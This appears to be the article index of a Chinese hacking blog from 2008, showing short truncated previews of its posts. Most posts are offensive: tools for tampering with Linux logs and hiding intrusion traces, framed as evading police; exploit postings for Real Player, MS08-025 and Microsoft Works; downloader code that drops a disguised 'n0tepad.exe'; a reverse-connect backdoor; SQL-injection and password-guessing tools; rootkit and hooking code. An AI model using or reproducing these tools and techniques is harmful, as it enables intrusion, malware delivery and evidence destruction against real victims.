- 博客(235)
- 资源 (6)
- 收藏
- 关注
RSS订阅原创 输入小助手.vbs
有时,渗透时,溢出得个SHELL,或只有一个CMDSHELL,想下载些东西,或上传东西,时真是不方便啊 特别是当目标不能上网,或限制比较严格时… ECHO东西,手工输入,那个累啊….还是弄个脚本方便些… //把要ECHO的脚本,拖到此脚本上...根据提示操作即可 On Error Resume NextSet Arg=Wscript.argumentsIf Arg.count=0
2008-04-30 17:32:00
1127
原创 logtamper-v1.0 修改linux 日志的工具
还是放出来好了,免得老找我要这东西。功能应该比网上的日志清除工具都要好。它是修改,而不是纯粹的删除和清空基于wtmpclean改的,所以我名字都没换上几张图好了:修改wtmp与utmp 与username和hostname相符的条目,同时保留timestamp 修改lastlog,在下次同一帐号登录显示同一IP和时间。 所有文件都保留了timestamp 功能应该凑合够用了,主要是w
2008-04-30 17:31:00
2468
原创 跨站脚本-攻击和防御指向
摘要:1>什么是XSS?2>XSS脚本攻击3>制造一个cookie攻击4>保护XSS5>笨方法6>过滤绕过7>Flash攻击8>XSS 上传9>XSS 钓鱼____ ____/ / / /______/ /_____________________________________/ /______| / / / / || / /.:Chapter 1 - 什么是XSS? :./ / ||___/
2008-04-30 17:29:00
1286
原创 通用Inline Hook代码
#include "inlinehook.h"typedef struct _INLINE_HOOK_ITEM{ PBYTE HookAddress; //inlinehook 的位置 DWORD OrgBytesSize; // //PBYTE OrgBytes; //原始函数字节 PBYTE Ho
2008-04-30 17:10:00
1802
原创 远程无线攻克你的系统--Intel无线网卡的漏洞
Intel - PRO/Wireless 2200BG Network Connection,估计很多机器都是这个型号的无线网卡,赶紧升级吧..http://www.milw0rm.com/exploits/5461### This file is part of the Metasploit Framework and may be subject to# redistribution an
2008-04-30 17:08:00
1288
原创 警惕:多款杀毒软件存在严重漏洞
新闻来源:CoreLabs Advisory(AYANAMI REI的翻译)对多款杀毒软件和防火墙的SSDT Hook函数的参数验证不严。通过对多款杀毒软件和防火墙的(BitDefender Antivirus [1], Comodo Firewall [2], Sophos Antivirus [3]和瑞星杀毒软件[4])的SSDT hook 函数的粗略检查发现可以导致拒绝服务(DOS),并可能
2008-04-30 17:06:00
1162
原创 linux入侵踪迹隐藏攻略
前言:被警察叔叔请去喝茶时间很痛苦的事情,各位道长如果功力不够又喜欢出风头的想必都有过这样的“待遇”。如何使自己在系统中隐藏的更深,是我们必须掌握的基本功。当然,如果管理员真的想搞你而他的功力又足够足的话,相信没什么人能够真正的“踏雪无痕”。Forensic 与Anti-Forensic,说到底只是你和管理员之间的技术间较量而已。貌似很少有专门说这个的文章,大部分就是下载个日志擦除的软件,然后运行
2008-04-30 17:05:00
1090
原创 远程包含和本地包含漏洞的原理
首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。几乎所有的 cgi程序都有这样的 bug,只是具体的表现方式不一样
2008-04-30 17:04:00
7420
原创 Real Player rmoc3260.dll Exp
milw0rm上的,生成器lcx给的,稍微改了改代码,据说好用未测试,最近忙到自杀的时间都没有唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。http://www.blogjava.net/Files/baicker/Real_Player_rmoc3260_exp.rar一下来源:lcx以下代码保存成vbs,双击即可On Error Resume NextExeurl = Inpu
2008-04-30 17:01:00
1159
原创 使用Visual Studio 2005编写纯C程序
步入.net时代后,VS马上就换了个脸,对那些平时用VC做作业的人来说,立马就受到了个下马威——直接新建源代码不能编译了!看到菜单栏上一堆一堆的选项,仿佛VS2005已经不能作为纯C的IDE使用了。然而VS的功能太强大,到底能否使用VS2005/2003编写纯C程序呢?当然可以!只是步骤会麻烦一些。首先,新建一个项目/工程: 选择“Win32控制台应用程序”。有些老师建议选择空项目,但是试过之后
2008-04-30 17:00:00
1801
原创 利用GetPrivateProfileString读取配置文件(.ini)
配置文件中经常用到ini文件,在VC中其函数分别为:写入.ini文件:bool WritePrivateProfileString(LPCTSTR lpAppName,LPCTSTR lpKeyName,LPCTSTR lpString,LPCTSTR lpFileName);读取.ini文件:DWORD GetPrivateProfileString(LPCTSTR lpAppName, LPC
2008-04-30 16:59:00
1465
原创 IPC空连接测试代码
//****************************************************//****** 网蝉工具--135弱口令猜解器 ******//ip.txt纪录要猜测的IP地址。//user.txt纪录要猜测的用户名。//password.txt纪录要猜测的密码。//3个文件格式为标准的字典文件, 方便与修改和承接其他扫描器扫出的结果。//**************
2008-04-30 16:43:00
1274
原创 判断Windows系统补丁
来自微软脚本专家:Set objSession = CreateObject("Microsoft.Update.Session")Set objSearcher = objSession.CreateUpdateSearcherSet objResults = objSearcher.Search("Type=Software")Set colUpdates = objResults.U
2008-04-30 16:42:00
1317
原创 使用perl通过adsi接口导出AD帐户列
开始是luoluo做的一个vbs脚本,实现从AD导出用户名的功能。脚本方面我偏爱perl,因此用perl重做了一个,顺便修复了luoluo脚本中的一个小bug,加了一行使脚本能够导出1000个以上的账号。perl脚本很简单,主要注意几点,首先是adsi的属性使用hash表的方式来设置或者获取;另外一个是注意有的属性有点不一样,需要设置hash的hash,例如$objCommand -> Prope
2008-04-30 16:41:00
1095
原创 攻击木马--远程控制软件自身的漏洞
前两天的RSA conference上,有个叫Joel Eriksson的研究人员展示如何通过攻击木马(尤其是木马的控制端)来控制“黑客”。blog.wired.com/27bstroke6/2008/04/researcher-demo.htmlEriksson找到了一个在天朝比较流行的PCshare的漏洞,可以上传文件到控制端的自启动目录。:)这是他展示的Pcshare的图片,这张貌似和他说的
2008-04-30 16:40:00
1240
原创 ATAPI(磁盘端口驱动)级文件保护简单实现
define IoGetIrpStackLocation( Irp , Level) (/ (Irp)->Tail.Overlay.CurrentStackLocation + Level )BOOL IfIrpHasFobj(PIRP pIrp , LPCWSTR FileName){ULONG i , j ;PIO_STACK_LOCATION irpStack ;PVOID NamePool
2008-04-30 16:40:00
1237
原创 Windows组件0Day漏洞 通杀IE6与IE7浏览器
[0day]Microsoft Works 7 WkImgSrv.dll crash POC,dll版本7.03.0616.0,IE7+Windows XP SP2 测试通过。[html][head][title]Microsoft Works 7 WkImgSrv.dll crash POC[/title][script language="JavaScript"] function pay
2008-04-30 16:38:00
752
原创 比较流行的数据库挂马
google_ad_client="pub-6065469188450680";google_ad_width=728;google_ad_height=90;google_ad_format="728x90_as";google_ad_type="text_image";google_ad_channel="6872543818";2007-01-10 15:00
2008-04-30 16:37:00
929
原创 逆向一个直接IO硬盘的驱动
【文章标题】: 逆向一个直接IO硬盘的驱动【文章作者】: prince【作者邮箱】: cracker_prince@163.com【作者QQ号】: 812937【软件名称】: SectorOperator.sys【下载地址】: http://bbs.pediy.com/showthread.php?s=&threadid=30708【加壳方式】: 无【编写语言】: ---【使用工具】: IDA 5
2008-04-30 16:32:00
1712
原创 一份非常棒的inline hook 代码
废话不多说,代码如下:#include #include #include ULONG g_KiInsertQueueApc;ULONG g_uCr0;BYTE g_HookCode[5] = { 0xe9, 0, 0, 0, 0 };BYTE g_OrigCode[5] = { 0 }; // Ôº¯Êý
2008-04-29 10:36:00
1323
原创 NT内核下的inline hook
inline hook原理大概如下: 修改被HOOK函数A的头5个字节,使其跳转到我们自定义的函数B,函数B的类型与函数A要相同。因为我们是使用JMP直接跳转到函数B, 而不是使用正常的CALL指令。在函数B内,我们可以检查函数参数,然后可以直接返回。也可以再调用函数A的一个副本。这个副本在HOOK动作发生的同时,就保存下来了。 代码非常简单,工程打包供大家学习。高手飘过/* *
2008-04-29 10:12:00
1160
原创 一种注入进程,获得完全操控的方法之二
看到了我的之一,我想大家会很清楚,因为这个方法的最大的BUG就是在回调函数之后来处理,如果前面已经处理了,那么我们就无法处理了。而且又要修改系统DLL,比较不完美。我最近又发现了两种方法: 一、修改RegisterClassA: 相对前面的方法来说,这个方法很好用,因为,我们可以很容易把回掉函数改掉。类似如下代码://--------------------------------------
2008-04-29 10:10:00
785
原创 inline hook和IDT hook结合
inline hook就是修改一个函数里面的几个字节为一条跳转指令,jmp到自己的函数中执行...... IDT HOOK就是修改IDT表中正常的异常处理例程的入口函数,为自己的函数地址 把这俩种思想结合起来就是""""一个字节钩子"""" 请看 nt!NtOpenFile: 80579
2008-04-29 10:08:00
858
原创 rootkit 直接访问硬件之[一]
作 者: combojiang时 间: 2008-03-27,15:14链 接: http://bbs.pediy.com/showthread.php?t=62020今天我们一起来学习下如何实现ring3程序直接访问硬件。这部分内容跟windows保护模式中的I/O保护部分有直接的关系。rootkit直接访问硬件准备写三篇,今天是开篇。后续请大家继续跟贴。高手飘过,呵呵。我们来看看Windows
2008-04-29 10:07:00
1001
原创 发一个下载者代码
void download(){DWORD dwStatusCode; char dwStatusCode1[32]; DWORD dwSize1 = sizeof(dwStatusCode1); DWORD dwSize = sizeof(DWORD); int filesize; LPCSTR localPatch="c://windows//n0tepad.exe"; HINTERNET h
2008-04-24 16:28:00
1407
1
原创 共享杀线程的代码
/* TerminateThread.c */ #include "ntddk.h" #include "LDasm.h" //网上很多的,自己找一个好了。 typedef enum _KAPC_ENVIRONMENT { originalApcEnvironment, AttachedApcEnvironment, Curren
2008-04-24 16:26:00
955
原创 Sql注入SA权限CMD终结者C源码
Poered By CoolDiyer //由于时间问题,没加注释学过C的应该都能看懂 ////////////////////////////////////////////////////////////////////////////////////////////////////// #include #include #include #include #pragma comment
2008-04-24 16:24:00
1742
1
原创 MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行#include #include typedef LONG NTSTATUS; typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE
2008-04-22 16:27:00
1710
1
原创 最通用的自删除代码
过win 98/2000/xp/2003 (Vista没有测试 因为我没有Vista)#include #pragma oncevoid SelfDel(){ int i; HANDLE hFile; DWORD dwWritten; char selfpathaaa[MAX_PATH]={0}; char command[2048]={0}; char name[]="a
2008-04-21 10:36:00
1483
1
原创 sdcs V2.3 exe/dll 正+反弹后门
// SmartDoor.cpp : 定义 DLL 应用程序的入口点。//http://www.dream2fly.net///源码公布说明:从网络中来到网络中去,QQ:78623269定制^_^#include "stdafx.h"#include "SDdllw.h"#include #include #include #include using namespace::std;#includ
2008-04-21 10:35:00
1278
原创 Dll 文件脱壳
在分析样本时偶尔会遇到加保护壳的 Dll 文件,脱起来比较麻烦。由于加壳 Dll 文件的壳代码都是在 DllMain() 函数中,在调用 LoadLibrary() 加载 Dll 文件时,主函数就会执行。因此可以写个程序加载 Dll 文件,然后 Dump 出来,即可完成脱壳。虽然不能确定入口点和修复导入表,但代码部分应该都是正常的。具体代码如下:#include #include #include
2008-04-21 10:33:00
4278
2
原创 应用层下拷贝以独占方式打开的文件
在调用 CreateFile 这个 API 时,若 dwShareMode 这个参数赋为 0;则在此文件句柄被关闭之前,这个文件是无法被其它进程直接读取和拷贝的。比如文件 %SYSTEM%/config/SAM 就是被 system 进程以独占方式打开的。在应用层下,通过读簇的方式,能够实现对这种文件的拷贝。大概流程为:以FILE_READ_ATTRIBUTES 访问模式调用 CreateFil
2008-04-21 10:32:00
2078
原创 GetACP 使用
今天分析一个加了变形壳的样本,感觉不像有什么保护,可是一运行就退出了。仔细调试了一下,发现是壳中这段代码导致的退出:call dword ptr ds:[edi-10] ;GetACPcmp eax,3A8 jnz short nextpush 0call dword ptr ds:[edi-14] ;ExitProcess上网查了一下,GetACP
2008-04-21 10:31:00
3480
原创 深入理解C语言指针的奥秘
指针是一个特殊的变量,它里面存储的数值被解释成为内存里的一个地址。 要搞清一个指针需要搞清指针的四方面的内容:指针的类型,指针所指向的 类型,指针的值或者叫指针所指向的内存区,还有指针本身所占据的内存区。让我们分别说明。 先声明几个指针放着做例子: 例一: (1)int*ptr; (2)char*ptr; (3)int**ptr; (4)int(*ptr)[3]; (5
2008-04-18 17:33:00
923
原创 交叉编译Linux内核(2.6.22.6)
动手编译内核之前,至少应该看看源码根目录下的README文件,并参考一些其他的资料,了解编译一个内核所需要的基本条件和环境,以及基本的步骤。 我使用的交叉编译器是arm-iwmmxt-linux-gnueabi-gcc(4.2.1),选用的内核版本是Linux-2.6.22.6。以下操作均以普通用户身份进行: (1)make mrproper 编译之前检查内核源码树是否“
2008-04-18 17:32:00
1158
原创 Linux内核代码风格
Documentation/zh_CN/CodingStyle | 676 +++++++++++++++++++++++++++++++++++++++1 files changed, 676 insertions(+), 0 deletions(-)create mode 100644 Documentation/zh_CN/CodingStylediff --git a/Document
2008-04-18 17:31:00
1639
原创 Linux内核代码架构图
类别:Linux Kernel | 添加到搜藏 | 浏览(52) | 评论 (3) /*<
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人